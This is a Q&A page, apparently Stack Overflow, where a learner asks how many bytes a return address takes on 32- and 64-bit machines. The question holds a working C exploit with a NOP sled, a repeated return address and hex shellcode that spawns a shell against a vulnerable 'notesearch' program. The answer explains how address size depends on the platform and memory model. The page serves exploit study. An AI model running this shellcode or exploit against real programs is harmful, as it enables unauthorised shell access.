Search code examples
buffer-overflowshellcode

What is the size of a return address?

I know that this might sound a bit noobish, but I cant find this anywhere. On a 64 bit machine, how many bytes is a return address? What about 32 bit?

The reason I am asking is because I am learning about buffer overflow exploits and I have to write an exploit. There is this program that has alloted 100 characters in a buffer but doesn't check to see if it is being overflowed. The program I have so far is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>


const char shellcode[] = 
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";



int main(int argc, char *argv[]) {

    long int i, *ptr, ret, offset = 176;
    char *command, *buffer;

    command = (char *) malloc(200);
    memset(command, 0, 200); //Zero out the new memory

    strcpy(command, "./notesearch \'");
    buffer = command + strlen(command); // Set buffer at the end

    if(argc > 1) //Set offset
        offset = atoi(argv[1]);

    ret = ((long int) &i) - offset; //Set return address


    for(i=0; i <160; i+=8) //Fill buffer with return addres
        *((long int *)(buffer + i)) = ret;

    memset(buffer, 0x90, 60); //Build NOP sled
    memcpy(buffer+60, shellcode, sizeof(shellcode) -1);

    strcat(command, "\'");

    system(command); //Run Exploit
    free (command);
}

The reason I am wondering is because when i fill the buffer with the return address, I need to make sure that it is the correct size

Solution

  • It depends on what you mean by "64 bit machine" or "32 bit machine".

    Firstly, your question is tagged C. C platform can be implemented as fairly (or completely) independent from the underlying hardware, meaning that it can use return address of any size, regardless of the machine.

    Secondly, if C platform keeps close ties to the underlying hardware (as is usually the case), then on platforms with flat memory model it should be fairly straightforward: 64 bit machine means 64 bit return address; 32 bit machine means 32 bit return address.

    On the other hand, on platforms with segmented memory it might depend on compiler-provided run-time memory model. For example on DOS platform for 16-bit machines return address could be 16 or 32 bit depending on selected memory model.